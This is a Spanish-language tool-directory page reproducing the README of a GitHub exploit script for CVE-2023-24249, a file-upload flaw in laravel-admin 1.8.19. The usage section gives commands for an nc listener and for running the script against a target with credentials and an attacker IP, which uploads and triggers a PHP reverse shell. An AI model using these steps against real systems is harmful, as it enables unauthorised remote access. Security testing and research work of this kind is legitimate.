Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-24249-Exploit — Script de exploit para CVE-2023-24249: una vulnerabilidad que permite la ejecución remota de código mediante la carga de archivos y la inyección de comandos. | Kitploit
Herramientas/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Script de exploit para CVE-2023-24249: una vulnerabilidad que permite la ejecución remota de código mediante la carga de archivos y la inyección de comandos.

Ver Repositorio
9112hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Script de explotación CVE-2023-24249

Descripción

Este repositorio contiene un script de explotación para CVE-2023-24249, una vulnerabilidad crítica encontrada en laravel-admin versión 1.8.19. Esta vulnerabilidad permite la carga arbitraria de archivos, lo que permite a los atacantes ejecutar código arbitrario mediante un archivo PHP manipulado. El exploit demuestra cómo un atacante puede subir una reverse shell a la aplicación objetivo y ejecutarla para obtener acceso remoto.

Detalles de la vulnerabilidad

CVE-2023-24249 es una vulnerabilidad de carga arbitraria de archivos en laravel-admin v1.8.19. Esta vulnerabilidad permite a los atacantes subir y ejecutar archivos PHP arbitrarios, lo que puede conducir a una ejecución remota de código.

  • Puntuación base: 7.2 HIGH
  • Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Enumeración de debilidades: CWE-434 - Carga sin restricciones de archivos con tipo peligroso

Referencias

Exploit - Aviso de terceros
  • Repositorio de Laravel Admin en GitHub
  • Sitio web oficial de Laravel Admin
  • Script de explotación

    El script de explotación proporcionado automatiza el proceso de explotación de CVE-2023-24249. Realiza los siguientes pasos:

    1. Autenticarse: Inicia sesión en la aplicación objetivo utilizando las credenciales proporcionadas.
    2. Subir reverse shell: Sube un script de reverse shell PHP a través de la funcionalidad vulnerable de carga de archivos.
    3. Ejecutar reverse shell: Envía una solicitud GET al script de reverse shell subido para ejecutarlo y establecer una conexión de vuelta a la máquina del atacante.

    Requisitos

    • Python 3
    • Biblioteca requests
    • Biblioteca beautifulsoup4

    Instale las bibliotecas requeridas usando pip:

    root@kitploit:~
    pip install requests beautifulsoup4
    

    Uso

    1. Clonar el repositorio:

      root@kitploit:~
      git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
      cd CVE-2023-24249-Exploit
      
    2. Iniciar un listener en su máquina:

      root@kitploit:~
      nc -lvnp <PORT>
      
    3. Ejecutar el script de explotación:

      root@kitploit:~
      python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
      

      Reemplace <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> y <YOUR_PORT> con los valores adecuados:

      • <TARGET_URL>: La URL de la aplicación objetivo.
      • <USERNAME>: El nombre de usuario para la autenticación.
      • <PASSWORD>: La contraseña para la autenticación.
      • <YOUR_IP>: Su dirección IP para recibir la conexión reverse shell.
      • <YOUR_PORT>: El puerto en el que se está ejecutando su listener.

    Ejemplo

    root@kitploit:~
    python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
    

    Salida del script

    Si el exploit tiene éxito, el script mostrará:

    root@kitploit:~
    [+] Reverse shell uploaded successfully! Attempting to execute it...
    [+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
    

    Aviso legal

    Este script está destinado únicamente a fines educativos. El uso no autorizado de este script contra cualquier sistema sin permiso explícito es ilegal y poco ético. El autor no es responsable de ningún uso indebido o daño causado por este script.

    Descargar herramienta